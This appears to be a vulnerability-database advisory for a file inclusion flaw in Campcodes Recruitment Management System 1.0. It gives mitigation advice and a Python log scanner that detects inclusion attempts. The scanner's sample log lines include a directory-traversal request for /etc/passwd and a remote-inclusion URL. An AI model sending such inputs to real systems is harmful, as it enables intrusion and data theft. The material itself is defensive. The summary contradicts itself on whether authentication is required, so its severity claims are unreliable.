CVE-2025-9920: File Inclusion in Campcodes Recruitment Management System
A security flaw has been discovered in Campcodes Recruitment Management System 1.0. This impacts the function include of the file /admin/index.php. The manipulation of the argument page results in file inclusion. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited.
AI Analysis
Technical Summary
CVE-2025-9920 is a file inclusion vulnerability identified in version 1.0 of the Campcodes Recruitment Management System, specifically affecting the /admin/index.php file. The vulnerability arises from improper handling of the 'page' parameter within the include function, allowing an attacker to manipulate this argument to include arbitrary files. This type of vulnerability typically enables an attacker to perform local or remote file inclusion (LFI/RFI), potentially leading to unauthorized code execution, information disclosure, or system compromise. The vulnerability can be exploited remotely without user interaction and does not require authentication, increasing its risk profile. The CVSS 4.0 base score is 5.1, categorized as medium severity, reflecting a network attack vector with low complexity and no user interaction, but requiring high privileges (PR:H). The impact on confidentiality, integrity, and availability is rated low, indicating limited but non-negligible damage potential. No patches or mitigations have been officially released at the time of publication, and although the exploit code has been publicly disclosed, there are no confirmed reports of active exploitation in the wild. The vulnerability's presence in a recruitment management system suggests potential exposure of sensitive personal and organizational data if exploited.
Potential Impact
For European organizations using Campcodes Recruitment Management System 1.0, this vulnerability poses a risk of unauthorized access to administrative functions and potentially sensitive recruitment data, including personally identifiable information (PII) of candidates and employees. Exploitation could lead to data leakage, manipulation of recruitment records, or deployment of malicious code within the affected system. Given the GDPR regulations in Europe, any data breach involving personal data could result in significant legal and financial penalties. The medium severity rating suggests that while the vulnerability is not trivially exploitable without elevated privileges, the remote attack vector and the absence of any user-interaction requirement increase the risk. Organizations relying on this system for critical HR functions may face operational disruptions and reputational damage if the vulnerability is exploited. Additionally, attackers could leverage this vulnerability as a foothold for lateral movement within the network, escalating the impact beyond the recruitment system itself.
Mitigation Recommendations
To mitigate this vulnerability, European organizations should immediately audit their deployment of Campcodes Recruitment Management System and identify any instances running version 1.0. Since no official patch is currently available, organizations should implement compensating controls such as restricting network access to the administrative interface via firewalls or VPNs, limiting exposure to trusted IP addresses only. Input validation and sanitization should be enforced on the 'page' parameter to prevent malicious file inclusion attempts. Employing web application firewalls (WAFs) with rules targeting file inclusion attack patterns can provide additional protection. Monitoring logs for unusual access patterns or attempts to manipulate the 'page' parameter is critical for early detection. Organizations should also plan to upgrade to a patched version once available or consider alternative recruitment management solutions with better security postures. Regular security assessments and penetration testing focused on this vulnerability can help identify residual risks.
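The log monitoring recommended above can be scripted over web-server access logs. The following is an added example (not code from the advisory or from Campcodes): it assumes a hypothetical allowlist of legitimate page names and uses constructed log lines, and flags requests to /admin/index.php whose 'page' value contains directory traversal, a URL scheme, a null byte, or a value outside the allowlist.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical allowlist of page names /admin/index.php legitimately serves (assumption).
ALLOWED_PAGES = {"home", "applicants", "vacancies", "users"}

# Generic file-inclusion indicators checked against the decoded 'page' value.
INCLUSION_PATTERNS = [
    (re.compile(r"\.\./|\.\.\\"), "directory traversal"),
    (re.compile(r"^[a-z][a-z0-9+.-]*://", re.I), "remote or wrapper URL scheme"),
    (re.compile(r"\x00"), "null byte"),
]

# Common Log Format: ip ident user [timestamp] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

def classify_page_value(value):
    # Decode twice so double-encoded input (e.g. %252e) is still caught.
    decoded = unquote(unquote(value))
    reasons = [label for pattern, label in INCLUSION_PATTERNS if pattern.search(decoded)]
    if not reasons and decoded not in ALLOWED_PAGES:
        reasons.append("value not in page allowlist")
    return reasons

def scan_access_log(lines):
    # Returns one finding per request to /admin/index.php with a suspicious 'page' value.
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        target = urlsplit(match.group("target"))
        if target.path != "/admin/index.php":
            continue
        for value in parse_qs(target.query, keep_blank_values=True).get("page", []):
            reasons = classify_page_value(value)
            if reasons:
                findings.append({"ip": match.group("ip"), "time": match.group("ts"),
                                 "page": value, "status": match.group("status"), "reasons": reasons})
    return findings

# Constructed sample log lines (not taken from any real deployment).
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Sep/2025:14:02:11 +0000] "GET /admin/index.php?page=applicants HTTP/1.1" 200 5120',
    '203.0.113.5 - - [03/Sep/2025:14:02:19 +0000] "GET /admin/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [03/Sep/2025:14:03:02 +0000] "GET /admin/index.php?page=http://203.0.113.9/x.txt HTTP/1.1" 200 97',
    '198.51.100.7 - - [03/Sep/2025:14:03:40 +0000] "GET /index.php?page=..%2Fconfig HTTP/1.1" 404 210',
    '203.0.113.5 - - [03/Sep/2025:14:04:05 +0000] "GET /admin/index.php?page=settings HTTP/1.1" 200 2210',
]
```

Running `scan_access_log(SAMPLE_LOG)` yields three findings: the traversal request, the remote-URL request, and the unlisted `settings` value; the `/index.php` line is ignored because only the affected admin path is inspected.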
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-09-03T11:09:23.914Z
- CVSS Version: 4.0
- State: PUBLISHED
Added to database: 9/3/2025, 4:17:46 PM
Last enriched: 9/3/2025, 4:32:43 PM
Last updated: 9/4/2025, 3:30:22 AM